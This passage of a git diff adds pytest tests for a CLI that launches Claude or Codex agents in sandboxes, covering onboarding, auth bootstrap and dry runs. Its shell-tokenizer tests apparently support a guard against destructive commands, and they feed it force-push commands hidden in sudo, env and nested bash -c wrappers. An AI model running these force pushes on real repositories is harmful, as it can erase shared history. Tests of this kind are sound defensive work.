mock_adapters.sandbox_runtime = mock_runtime + mock_codex_provider = MagicMock() + + with ( + patch("scc_cli.setup.get_default_adapters", return_value=mock_adapters), + patch( + "scc_cli.setup.collect_provider_readiness", + side_effect=[readiness_before, readiness_after], + ), + patch( + "scc_cli.setup.get_agent_provider", + return_value=mock_codex_provider, + ), + patch("scc_cli.setup._prompt_provider_connections", return_value=("codex",)), + patch("scc_cli.setup._prompt_provider_preference", return_value="codex"), + patch("scc_cli.setup.config.get_selected_provider", return_value=None), + patch("scc_cli.setup.config.set_selected_provider"), + ): + console = MagicMock() + result_readiness, result_pref = _run_provider_onboarding(console) + + # bootstrap_auth called once for codex + mock_codex_provider.bootstrap_auth.assert_called_once() + assert result_pref == "codex" + + def test_preference_prompt_only_when_both_connected_after_onboarding(self) -> None: + """Preference prompt only shows when both are connected AFTER onboarding refresh.""" + readiness_before = { + "claude": _readiness("present"), + "codex": _readiness("missing"), + } + # After onboarding, codex is still missing + readiness_after = { + "claude": _readiness("present"), + "codex": _readiness("missing"), + } + mock_runtime = MagicMock() + mock_adapters = MagicMock() + mock_adapters.sandbox_runtime = mock_runtime + + with ( + patch("scc_cli.setup.get_default_adapters", return_value=mock_adapters), + patch( + "scc_cli.setup.collect_provider_readiness", + side_effect=[readiness_before, readiness_after], + ), + patch("scc_cli.setup._prompt_provider_connections", return_value=()), + patch("scc_cli.setup._prompt_provider_preference") as mock_pref, + patch("scc_cli.setup.config.get_selected_provider", return_value=None), + ): + console = MagicMock() + result_readiness, result_pref = _run_provider_onboarding(console) + + # Preference prompt NOT shown because codex is still missing + mock_pref.assert_not_called() + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _prompt_provider_preference — preference persistence +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestPromptProviderPreference: + """Verify provider preference prompt behavior.""" + + def test_returns_ask_for_first_selection(self) -> None: + """Default selection (index 0) returns 'ask'.""" + console = MagicMock() + with patch("scc_cli.setup._select_option", return_value=0): + result = _prompt_provider_preference(console, current=None) + assert result == "ask" + + def test_returns_claude_for_second_selection(self) -> None: + """Index 1 returns 'claude'.""" + console = MagicMock() + with patch("scc_cli.setup._select_option", return_value=1): + result = _prompt_provider_preference(console, current=None) + assert result == "claude" + + def test_returns_codex_for_third_selection(self) -> None: + """Index 2 returns 'codex'.""" + console = MagicMock() + with patch("scc_cli.setup._select_option", return_value=2): + result = _prompt_provider_preference(console, current=None) + assert result == "codex" + + def test_returns_current_on_escape(self) -> None: + """None (escape) preserves the current preference.""" + console = MagicMock() + with patch("scc_cli.setup._select_option", return_value=None): + result = _prompt_provider_preference(console, current="claude") + assert result == "claude" + + def test_preselects_claude_when_current_is_claude(self) -> None: + """When current is 'claude', default_index should be 1.""" + console = MagicMock() + with patch("scc_cli.setup._select_option", return_value=1) as mock_select: + _prompt_provider_preference(console, current="claude") + # default parameter should be 1 + call_args = mock_select.call_args + assert call_args[1].get("default") == 1 or call_args[0][2] == 1 + + def test_preselects_codex_when_current_is_codex(self) -> None: + """When current is 'codex', default_index should be 2.""" + console = MagicMock() + with patch("scc_cli.setup._select_option", return_value=2) as mock_select: + _prompt_provider_preference(console, current="codex") + call_args = mock_select.call_args + assert call_args[1].get("default") == 2 or call_args[0][2] == 2 diff --git a/tests/test_setup_wizard.py b/tests/test_setup_wizard.py index 2a54fd2..bdd1625 100644 --- a/tests/test_setup_wizard.py +++ b/tests/test_setup_wizard.py @@ -294,6 +294,7 @@ def test_full_org_config_flow(self, tmp_path): patch("scc_cli.setup.fetch_and_validate_org_config", return_value=sample_config), patch("scc_cli.setup.config.load_user_config", return_value={}), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = setup.run_setup_wizard(mock_console) @@ -309,6 +310,7 @@ def test_standalone_flow(self, tmp_path): patch("scc_cli.setup._select_option", side_effect=[1, 0, 0]), patch("scc_cli.setup.config.load_user_config", return_value={}), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = setup.run_setup_wizard(mock_console) @@ -335,6 +337,7 @@ def test_auth_retry_flow(self, tmp_path): patch("scc_cli.setup.prompt_with_layout", return_value="MY_TOKEN"), # Env var name patch("scc_cli.setup.config.load_user_config", return_value={}), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = setup.run_setup_wizard(mock_console) @@ -360,6 +363,7 @@ def test_setup_with_all_args(self, tmp_path): with ( patch("scc_cli.setup.fetch_and_validate_org_config", return_value=sample_config), patch("scc_cli.setup.save_setup_config") as mock_save, + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = setup.run_non_interactive_setup( @@ -376,6 +380,7 @@ def test_standalone_setup(self, tmp_path): mock_console = MagicMock() with ( patch("scc_cli.setup.save_setup_config") as mock_save, + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = setup.run_non_interactive_setup( diff --git a/tests/test_shell_tokenizer.py b/tests/test_shell_tokenizer.py new file mode 100644 index 0000000..ebd18ad --- /dev/null +++ b/tests/test_shell_tokenizer.py @@ -0,0 +1,206 @@ +"""Tests for shell command tokenization.""" + +from __future__ import annotations + +from scc_cli.core.shell_tokenizer import ( + extract_all_commands, + extract_bash_c, + split_commands, + strip_wrappers, + tokenize, +) + + +class TestSplitCommands: + """Tests for split_commands function.""" + + def test_empty_command(self) -> None: + assert split_commands("") == [] + assert split_commands(" ") == [] + + def test_single_command(self) -> None: + assert split_commands("git push") == ["git push"] + + def test_semicolon_separator(self) -> None: + result = split_commands("echo foo; git push") + assert result == ["echo foo", "git push"] + + def test_and_separator(self) -> None: + result = split_commands("echo foo && git push") + assert result == ["echo foo", "git push"] + + def test_or_separator(self) -> None: + result = split_commands("echo foo || git push") + assert result == ["echo foo", "git push"] + + def test_pipe_separator(self) -> None: + result = split_commands("echo foo | git push") + assert result == ["echo foo", "git push"] + + def test_multiple_separators(self) -> None: + result = split_commands("a && b; c || d") + assert result == ["a", "b", "c", "d"] + + def test_complex_command(self) -> None: + result = split_commands("echo foo && git push --force; ls") + assert result == ["echo foo", "git push --force", "ls"] + + +class TestTokenize: + """Tests for tokenize function.""" + + def test_empty_input(self) -> None: + assert tokenize("") == [] + assert tokenize(" ") == [] + + def test_simple_command(self) -> None: + assert tokenize("git push") == ["git", "push"] + + def test_quoted_argument(self) -> None: + assert tokenize('git commit -m "message"') == ["git", "commit", "-m", "message"] + + def test_single_quotes(self) -> None: + assert tokenize("echo 'hello world'") == ["echo", "hello world"] + + def test_flags_and_values(self) -> None: + result = tokenize("git push --force origin main") + assert result == ["git", "push", "--force", "origin", "main"] + + def test_malformed_quotes(self) -> None: + # Should return empty list on parse error + assert tokenize("echo 'unclosed") == [] + + +class TestStripWrappers: + """Tests for strip_wrappers function.""" + + def test_empty_list(self) -> None: + assert strip_wrappers([]) == [] + + def test_no_wrappers(self) -> None: + assert strip_wrappers(["git", "push"]) == ["git", "push"] + + def test_strip_sudo(self) -> None: + assert strip_wrappers(["sudo", "git", "push"]) == ["git", "push"] + + def test_strip_sudo_with_flags(self) -> None: + result = strip_wrappers(["sudo", "-u", "root", "git", "push"]) + assert result == ["git", "push"] + + def test_strip_env(self) -> None: + assert strip_wrappers(["env", "git", "push"]) == ["git", "push"] + + def test_strip_env_with_vars(self) -> None: + result = strip_wrappers(["env", "VAR=val", "git", "push"]) + assert result == ["git", "push"] + + def test_strip_command(self) -> None: + assert strip_wrappers(["command", "git", "push"]) == ["git", "push"] + + def test_strip_nohup(self) -> None: + assert strip_wrappers(["nohup", "git", "push"]) == ["git", "push"] + + def test_strip_time(self) -> None: + assert strip_wrappers(["time", "git", "push"]) == ["git", "push"] + + def test_strip_nice(self) -> None: + assert strip_wrappers(["nice", "git", "push"]) == ["git", "push"] + + def test_strip_nice_with_priority(self) -> None: + result = strip_wrappers(["nice", "-n", "10", "git", "push"]) + assert result == ["git", "push"] + + def test_strip_multiple_wrappers(self) -> None: + result = strip_wrappers(["sudo", "env", "VAR=1", "git", "push"]) + assert result == ["git", "push"] + + def test_full_path_wrapper(self) -> None: + assert strip_wrappers(["/usr/bin/sudo", "git", "push"]) == ["git", "push"] + + +class TestExtractBashC: + """Tests for extract_bash_c function.""" + + def test_empty_tokens(self) -> None: + assert extract_bash_c([]) is None + + def test_short_tokens(self) -> None: + assert extract_bash_c(["bash"]) is None + assert extract_bash_c(["bash", "-c"]) is None + + def test_bash_c_pattern(self) -> None: + result = extract_bash_c(["bash", "-c", "git push --force"]) + assert result == "git push --force" + + def test_sh_c_pattern(self) -> None: + result = extract_bash_c(["sh", "-c", "git push"]) + assert result == "git push" + + def test_zsh_c_pattern(self) -> None: + result = extract_bash_c(["zsh", "-c", "echo hello"]) + assert result == "echo hello" + + def test_full_path_shell(self) -> None: + result = extract_bash_c(["/bin/bash", "-c", "git push"]) + assert result == "git push" + + def test_not_a_shell(self) -> None: + assert extract_bash_c(["python", "-c", "print('hi')"]) is None + + def test_no_c_flag(self) -> None: + assert extract_bash_c(["bash", "-x", "script.sh"]) is None + + +class TestExtractAllCommands: + """Tests for extract_all_commands function.""" + + def test_empty_command(self) -> None: + assert list(extract_all_commands("")) == [] + + def test_simple_command(self) -> None: + result = list(extract_all_commands("git push")) + assert result == [["git", "push"]] + + def test_command_with_operators(self) -> None: + result = list(extract_all_commands("echo foo && git push")) + assert ["echo", "foo"] in result + assert ["git", "push"] in result + + def test_bash_c_extraction(self) -> None: + result = list(extract_all_commands("bash -c 'git push -f'")) + # Should include both the bash -c command and the extracted command + assert ["bash", "-c", "git push -f"] in result + assert ["git", "push", "-f"] in result + + def test_nested_bash_c(self) -> None: + # Nested: bash -c "bash -c 'git push -f'" + result = list(extract_all_commands("bash -c \"bash -c 'git push -f'\"")) + assert ["git", "push", "-f"] in result + + def test_max_recursion_depth(self) -> None: + # Should not exceed MAX_RECURSION_DEPTH (3) + deep_nested = 'bash -c "bash -c \\"bash -c \'bash -c \\\\\\"git push\\\\\\"\'\\""' + result = list(extract_all_commands(deep_nested)) + # Should have some results but not infinitely recurse + assert len(result) <= 5 + + def test_sudo_wrapped_command(self) -> None: + result = list(extract_all_commands("sudo git push --force")) + assert ["git", "push", "--force"] in result + + def test_complex_pipeline(self) -> None: + # Test a simpler case that our parser handles correctly + # Note: Our simple split_commands doesn't respect quotes, + # so operators inside bash -c strings need the && outside + cmd = "sudo bash -c 'git push --force'" + result = list(extract_all_commands(cmd)) + # Should find git push --force inside the bash -c + found_git_force = any("git" in tokens and "--force" in tokens for tokens in result) + assert found_git_force + + def test_chained_commands_with_destructive(self) -> None: + # When operators are outside quotes, we detect them + cmd = "echo start && sudo git push --force" + result = list(extract_all_commands(cmd)) + found_git_force = any("git" in tokens and "--force" in tokens for tokens in result) + assert found_git_force diff --git a/tests/test_start_cancellation.py b/tests/test_start_cancellation.py index a99bade..36b0337 100644 --- a/tests/test_start_cancellation.py +++ b/tests/test_start_cancellation.py @@ -20,7 +20,7 @@ def test_start_cancelled_exits_130_and_message(): patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), patch( "scc_cli.commands.launch.flow._resolve_session_selection", - return_value=(None, None, None, None, True, False), + return_value=(None, None, None, None, True, False, None), ), ): result = runner.invoke(app, ["start"]) diff --git a/tests/test_start_codex_auth_bootstrap.py b/tests/test_start_codex_auth_bootstrap.py new file mode 100644 index 0000000..39ef773 --- /dev/null +++ b/tests/test_start_codex_auth_bootstrap.py @@ -0,0 +1,342 @@ +"""Tests for Codex auth bootstrap integration through the start flow. + +Verifies that flow.py delegates to the shared preflight readiness path +(collect_launch_readiness + ensure_launch_ready) which handles image +and auth bootstrap for all providers. +""" + +from __future__ import annotations + +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.application.start_session import StartSessionDependencies, StartSessionPlan +from scc_cli.commands.launch.conflict_resolution import ( + LaunchConflictDecision, + LaunchConflictResolution, +) +from scc_cli.commands.launch.flow import start +from scc_cli.commands.launch.preflight import ( + AuthStatus, + ImageStatus, + LaunchReadiness, + ProviderResolutionSource, +) +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.core.workspace import ResolverResult +from scc_cli.ports.models import MountSpec, SandboxSpec + + +def _build_plan(tmp_path: Path) -> StartSessionPlan: + resolver = ResolverResult( + workspace_root=tmp_path, + entry_dir=tmp_path, + mount_root=tmp_path, + container_workdir=str(tmp_path), + is_auto_detected=False, + is_suspicious=False, + reason="explicit", + ) + sandbox_spec = SandboxSpec( + image="scc-agent-codex:latest", + workspace_mount=MountSpec(source=tmp_path, target=tmp_path), + workdir=tmp_path, + provider_id="codex", + ) + return StartSessionPlan( + resolver_result=resolver, + workspace_path=tmp_path, + team=None, + session_name="demo", + resume=False, + fresh=False, + current_branch="feature/demo", + effective_config=None, + sync_result=None, + sync_error_message=None, + agent_settings=None, + sandbox_spec=sandbox_spec, + agent_launch_spec=None, + ) + + +def _build_dependencies() -> StartSessionDependencies: + return StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=MagicMock(), + agent_runner=MagicMock(), + agent_provider=MagicMock(), + sandbox_runtime=MagicMock(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + +def _build_adapters() -> MagicMock: + adapters = MagicMock() + adapters.sandbox_runtime.ensure_available.return_value = None + adapters.filesystem = MagicMock() + adapters.personal_profile_service.workspace_has_overrides.return_value = False + return adapters + + +def _readiness_auth_missing() -> LaunchReadiness: + """Build a readiness snapshot indicating missing auth.""" + return LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + + +def _readiness_all_good() -> LaunchReadiness: + """Build a readiness snapshot indicating everything is ready.""" + return LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=False, + requires_auth_bootstrap=False, + launch_ready=True, + ) + + +def _invoke_start(tmp_path: Path, *, non_interactive: bool) -> None: + start( + workspace=str(tmp_path), + team=None, + session_name="demo", + resume=False, + select=False, + worktree_name=None, + fresh=False, + install_deps=False, + offline=False, + standalone=True, + dry_run=False, + json_output=False, + pretty=False, + non_interactive=non_interactive, + debug=False, + allow_suspicious_workspace=False, + provider="codex", + ) + + +@patch("scc_cli.commands.launch.flow.finalize_launch") +@patch("scc_cli.commands.launch.flow.show_launch_panel") +@patch("scc_cli.commands.launch.flow.show_auth_bootstrap_panel") +@patch("scc_cli.commands.launch.flow.ensure_launch_ready") +@patch("scc_cli.commands.launch.flow.collect_launch_readiness") +@patch("scc_cli.commands.launch.flow.set_workspace_last_used_provider") +@patch("scc_cli.commands.launch.flow._record_session_and_context") +@patch("scc_cli.commands.launch.flow.resolve_launch_conflict") +@patch("scc_cli.commands.launch.flow.warn_if_non_worktree") +@patch("scc_cli.commands.launch.flow._apply_personal_profile", return_value=(None, False)) +@patch("scc_cli.commands.launch.flow.render_launch_output") +@patch("scc_cli.commands.launch.flow.build_sync_output_view_model") +@patch("scc_cli.commands.launch.flow.prepare_live_start_plan") +@patch("scc_cli.commands.launch.flow.resolve_launch_provider", return_value=("codex", "explicit")) +@patch("scc_cli.commands.launch.flow.resolve_workspace_team", return_value=None) +@patch("scc_cli.commands.launch.flow.prepare_workspace") +@patch("scc_cli.commands.launch.flow.validate_and_resolve_workspace") +@patch("scc_cli.commands.launch.flow.sessions.get_session_service") +@patch("scc_cli.commands.launch.flow.get_default_adapters") +@patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}) +@patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False) +def test_start_calls_ensure_launch_ready_when_auth_missing( + mock_setup: MagicMock, + mock_cfg: MagicMock, + mock_get_adapters: MagicMock, + mock_session_service: MagicMock, + mock_validate_workspace: MagicMock, + mock_prepare_workspace: MagicMock, + mock_resolve_team: MagicMock, + mock_resolve_provider: MagicMock, + mock_prepare_live_start_plan: MagicMock, + mock_build_output: MagicMock, + mock_render_output: MagicMock, + mock_apply_profile: MagicMock, + mock_warn_non_worktree: MagicMock, + mock_resolve_conflict: MagicMock, + mock_record_session: MagicMock, + mock_set_workspace_provider: MagicMock, + mock_collect_readiness: MagicMock, + mock_ensure_ready: MagicMock, + mock_show_auth_bootstrap: MagicMock, + mock_show_launch: MagicMock, + mock_finalize_launch: MagicMock, + tmp_path: Path, +) -> None: + """When auth is missing, flow.py calls ensure_launch_ready which handles + image pull + auth bootstrap through the shared preflight path.""" + plan = _build_plan(tmp_path) + dependencies = _build_dependencies() + mock_get_adapters.return_value = _build_adapters() + mock_validate_workspace.return_value = tmp_path + mock_prepare_workspace.return_value = tmp_path + mock_prepare_live_start_plan.return_value = (dependencies, plan) + mock_resolve_conflict.return_value = LaunchConflictResolution( + decision=LaunchConflictDecision.PROCEED, + plan=plan, + ) + mock_collect_readiness.return_value = _readiness_auth_missing() + + _invoke_start(tmp_path, non_interactive=False) + + mock_collect_readiness.assert_called_once() + mock_ensure_ready.assert_called_once() + # Verify the readiness object was passed through + call_args = mock_ensure_ready.call_args + assert call_args[0][0].requires_auth_bootstrap is True + mock_show_launch.assert_called_once() + mock_finalize_launch.assert_called_once() + mock_set_workspace_provider.assert_called_once_with(tmp_path, "codex") + + +@patch("scc_cli.commands.launch.flow.finalize_launch") +@patch("scc_cli.commands.launch.flow.show_launch_panel") +@patch("scc_cli.commands.launch.flow.show_auth_bootstrap_panel") +@patch("scc_cli.commands.launch.flow.ensure_launch_ready") +@patch("scc_cli.commands.launch.flow.collect_launch_readiness") +@patch("scc_cli.commands.launch.flow.set_workspace_last_used_provider") +@patch("scc_cli.commands.launch.flow._record_session_and_context") +@patch("scc_cli.commands.launch.flow.resolve_launch_conflict") +@patch("scc_cli.commands.launch.flow.warn_if_non_worktree") +@patch("scc_cli.commands.launch.flow._apply_personal_profile", return_value=(None, False)) +@patch("scc_cli.commands.launch.flow.render_launch_output") +@patch("scc_cli.commands.launch.flow.build_sync_output_view_model") +@patch("scc_cli.commands.launch.flow.prepare_live_start_plan") +@patch("scc_cli.commands.launch.flow.resolve_launch_provider", return_value=("codex", "explicit")) +@patch("scc_cli.commands.launch.flow.resolve_workspace_team", return_value=None) +@patch("scc_cli.commands.launch.flow.prepare_workspace") +@patch("scc_cli.commands.launch.flow.validate_and_resolve_workspace") +@patch("scc_cli.commands.launch.flow.sessions.get_session_service") +@patch("scc_cli.commands.launch.flow.get_default_adapters") +@patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}) +@patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False) +def test_start_non_interactive_codex_missing_auth_fails_early( + mock_setup: MagicMock, + mock_cfg: MagicMock, + mock_get_adapters: MagicMock, + mock_session_service: MagicMock, + mock_validate_workspace: MagicMock, + mock_prepare_workspace: MagicMock, + mock_resolve_team: MagicMock, + mock_resolve_provider: MagicMock, + mock_prepare_live_start_plan: MagicMock, + mock_build_output: MagicMock, + mock_render_output: MagicMock, + mock_apply_profile: MagicMock, + mock_warn_non_worktree: MagicMock, + mock_resolve_conflict: MagicMock, + mock_record_session: MagicMock, + mock_set_workspace_provider: MagicMock, + mock_collect_readiness: MagicMock, + mock_ensure_ready: MagicMock, + mock_show_auth_bootstrap: MagicMock, + mock_show_launch: MagicMock, + mock_finalize_launch: MagicMock, + tmp_path: Path, +) -> None: + """When auth is missing in non-interactive mode, ensure_launch_ready raises + ProviderNotReadyError and the launch does not proceed.""" + plan = _build_plan(tmp_path) + dependencies = _build_dependencies() + mock_get_adapters.return_value = _build_adapters() + mock_validate_workspace.return_value = tmp_path + mock_prepare_workspace.return_value = tmp_path + mock_prepare_live_start_plan.return_value = (dependencies, plan) + mock_resolve_conflict.return_value = LaunchConflictResolution( + decision=LaunchConflictDecision.PROCEED, + plan=plan, + ) + mock_collect_readiness.return_value = _readiness_auth_missing() + mock_ensure_ready.side_effect = ProviderNotReadyError( + provider_id="codex", + user_message="Codex auth cache is missing and this start is non-interactive.", + suggested_action="Run 'scc start --provider codex' interactively once.", + ) + + with pytest.raises(ProviderNotReadyError): + _invoke_start(tmp_path, non_interactive=True) + + mock_collect_readiness.assert_called_once() + mock_ensure_ready.assert_called_once() + mock_show_launch.assert_not_called() + mock_finalize_launch.assert_not_called() + mock_set_workspace_provider.assert_not_called() + + +@patch("scc_cli.commands.launch.flow.finalize_launch") +@patch("scc_cli.commands.launch.flow.show_launch_panel") +@patch("scc_cli.commands.launch.flow.show_auth_bootstrap_panel") +@patch("scc_cli.commands.launch.flow.ensure_launch_ready") +@patch("scc_cli.commands.launch.flow.collect_launch_readiness") +@patch("scc_cli.commands.launch.flow.set_workspace_last_used_provider") +@patch("scc_cli.commands.launch.flow._record_session_and_context") +@patch("scc_cli.commands.launch.flow.resolve_launch_conflict") +@patch("scc_cli.commands.launch.flow.warn_if_non_worktree") +@patch("scc_cli.commands.launch.flow._apply_personal_profile", return_value=(None, False)) +@patch("scc_cli.commands.launch.flow.render_launch_output") +@patch("scc_cli.commands.launch.flow.build_sync_output_view_model") +@patch("scc_cli.commands.launch.flow.prepare_live_start_plan") +@patch("scc_cli.commands.launch.flow.resolve_launch_provider", return_value=("codex", "explicit")) +@patch("scc_cli.commands.launch.flow.resolve_workspace_team", return_value=None) +@patch("scc_cli.commands.launch.flow.prepare_workspace") +@patch("scc_cli.commands.launch.flow.validate_and_resolve_workspace") +@patch("scc_cli.commands.launch.flow.sessions.get_session_service") +@patch("scc_cli.commands.launch.flow.get_default_adapters") +@patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}) +@patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False) +def test_start_skips_readiness_check_when_already_ready( + mock_setup: MagicMock, + mock_cfg: MagicMock, + mock_get_adapters: MagicMock, + mock_session_service: MagicMock, + mock_validate_workspace: MagicMock, + mock_prepare_workspace: MagicMock, + mock_resolve_team: MagicMock, + mock_resolve_provider: MagicMock, + mock_prepare_live_start_plan: MagicMock, + mock_build_output: MagicMock, + mock_render_output: MagicMock, + mock_apply_profile: MagicMock, + mock_warn_non_worktree: MagicMock, + mock_resolve_conflict: MagicMock, + mock_record_session: MagicMock, + mock_set_workspace_provider: MagicMock, + mock_collect_readiness: MagicMock, + mock_ensure_ready: MagicMock, + mock_show_auth_bootstrap: MagicMock, + mock_show_launch: MagicMock, + mock_finalize_launch: MagicMock, + tmp_path: Path, +) -> None: + """When readiness is already good, ensure_launch_ready is not called.""" + plan = _build_plan(tmp_path) + dependencies = _build_dependencies() + mock_get_adapters.return_value = _build_adapters() + mock_validate_workspace.return_value = tmp_path + mock_prepare_workspace.return_value = tmp_path + mock_prepare_live_start_plan.return_value = (dependencies, plan) + mock_resolve_conflict.return_value = LaunchConflictResolution( + decision=LaunchConflictDecision.PROCEED, + plan=plan, + ) + mock_collect_readiness.return_value = _readiness_all_good() + + _invoke_start(tmp_path, non_interactive=False) + + mock_collect_readiness.assert_called_once() + mock_ensure_ready.assert_not_called() + mock_finalize_launch.assert_called_once() diff --git a/tests/test_start_cross_team_resume_prompt.py b/tests/test_start_cross_team_resume_prompt.py index 23ef8d3..c8919d7 100644 --- a/tests/test_start_cross_team_resume_prompt.py +++ b/tests/test_start_cross_team_resume_prompt.py @@ -20,11 +20,16 @@ def test_cross_team_resume_prompt_text_top_level() -> None: ) with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=False), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[context]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=False + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[context]), patch( "scc_cli.ui.wizard.pick_context_quick_resume", return_value=(QuickResumeResult.SELECTED, context), @@ -51,11 +56,16 @@ def test_cross_team_resume_prompt_text_workspace_scope() -> None: ) with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=False), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[context]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=False + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[context]), patch( "scc_cli.ui.wizard.pick_context_quick_resume", side_effect=[ diff --git a/tests/test_start_dryrun.py b/tests/test_start_dryrun.py index 3cf204c..ce47f44 100644 --- a/tests/test_start_dryrun.py +++ b/tests/test_start_dryrun.py @@ -49,6 +49,7 @@ def test_dry_run_does_not_launch_docker(self, tmp_path, monkeypatch): install_deps=False, offline=False, standalone=False, + provider="claude", dry_run=True, ) except click.exceptions.Exit: @@ -81,6 +82,7 @@ def test_dry_run_shows_workspace_path(self, tmp_path, monkeypatch, capsys): install_deps=False, offline=False, standalone=False, + provider="claude", dry_run=True, ) except click.exceptions.Exit: @@ -117,7 +119,7 @@ def test_dry_run_shows_team_name(self, tmp_path, monkeypatch, capsys): return_value=mock_org, ): with patch( - "scc_cli.commands.launch.flow.teams.validate_team_profile", + "scc_cli.commands.launch.team_settings.teams.validate_team_profile", return_value={"valid": True}, ): try: @@ -132,6 +134,7 @@ def test_dry_run_shows_team_name(self, tmp_path, monkeypatch, capsys): install_deps=False, offline=False, standalone=False, + provider="claude", dry_run=True, ) except click.exceptions.Exit: @@ -173,6 +176,7 @@ def test_dry_run_json_has_correct_kind(self, tmp_path, monkeypatch, capsys): install_deps=False, offline=False, standalone=False, + provider="claude", dry_run=True, json_output=True, pretty=False, @@ -208,6 +212,7 @@ def test_dry_run_json_has_envelope_structure(self, tmp_path, monkeypatch, capsys install_deps=False, offline=False, standalone=False, + provider="claude", dry_run=True, json_output=True, pretty=False, @@ -285,7 +290,7 @@ def test_build_dry_run_data_includes_network_policy(self, tmp_path): from scc_cli.commands.launch import build_dry_run_data mock_org = { - "defaults": {"network_policy": "isolated"}, + "defaults": {"network_policy": "locked-down-web"}, "profiles": {"platform": {"description": "Platform team"}}, } @@ -296,7 +301,7 @@ def test_build_dry_run_data_includes_network_policy(self, tmp_path): project_config=None, ) - assert result["network_policy"] == "isolated" + assert result["network_policy"] == "locked-down-web" def test_build_dry_run_data_ready_to_start(self, tmp_path): """build_dry_run_data should indicate ready state when no blockers.""" @@ -347,6 +352,7 @@ def test_dry_run_exits_zero_when_ready(self, tmp_path, monkeypatch): install_deps=False, offline=False, standalone=False, + provider="claude", dry_run=True, ) exit_code = 0 # If no exit raised, exit code is 0 diff --git a/tests/test_start_live_conflict.py b/tests/test_start_live_conflict.py new file mode 100644 index 0000000..92d16ee --- /dev/null +++ b/tests/test_start_live_conflict.py @@ -0,0 +1,279 @@ +from __future__ import annotations + +from dataclasses import replace +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest +import typer + +from scc_cli.application.start_session import StartSessionDependencies, StartSessionPlan +from scc_cli.commands.launch.conflict_resolution import ( + LaunchConflictDecision, + LaunchConflictResolution, +) +from scc_cli.commands.launch.flow import start +from scc_cli.core.workspace import ResolverResult +from scc_cli.ports.models import MountSpec, SandboxSpec + + +def _build_plan(tmp_path: Path) -> StartSessionPlan: + resolver = ResolverResult( + workspace_root=tmp_path, + entry_dir=tmp_path, + mount_root=tmp_path, + container_workdir=str(tmp_path), + is_auto_detected=False, + is_suspicious=False, + reason="explicit", + ) + sandbox_spec = SandboxSpec( + image="scc-agent-codex:latest", + workspace_mount=MountSpec(source=tmp_path, target=tmp_path), + workdir=tmp_path, + provider_id="codex", + ) + return StartSessionPlan( + resolver_result=resolver, + workspace_path=tmp_path, + team=None, + session_name="demo", + resume=False, + fresh=False, + current_branch="feature/demo", + effective_config=None, + sync_result=None, + sync_error_message=None, + agent_settings=None, + sandbox_spec=sandbox_spec, + agent_launch_spec=None, + ) + + +def _build_start_dependencies() -> StartSessionDependencies: + return StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=MagicMock(), + agent_runner=MagicMock(), + sandbox_runtime=MagicMock(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + +def _build_adapters() -> MagicMock: + adapters = MagicMock() + adapters.sandbox_runtime.ensure_available.return_value = None + adapters.filesystem = MagicMock() + adapters.personal_profile_service.workspace_has_overrides.return_value = False + return adapters + + +def _invoke_start(tmp_path: Path) -> None: + start( + workspace=str(tmp_path), + team=None, + session_name="demo", + resume=False, + select=False, + worktree_name=None, + fresh=False, + install_deps=False, + 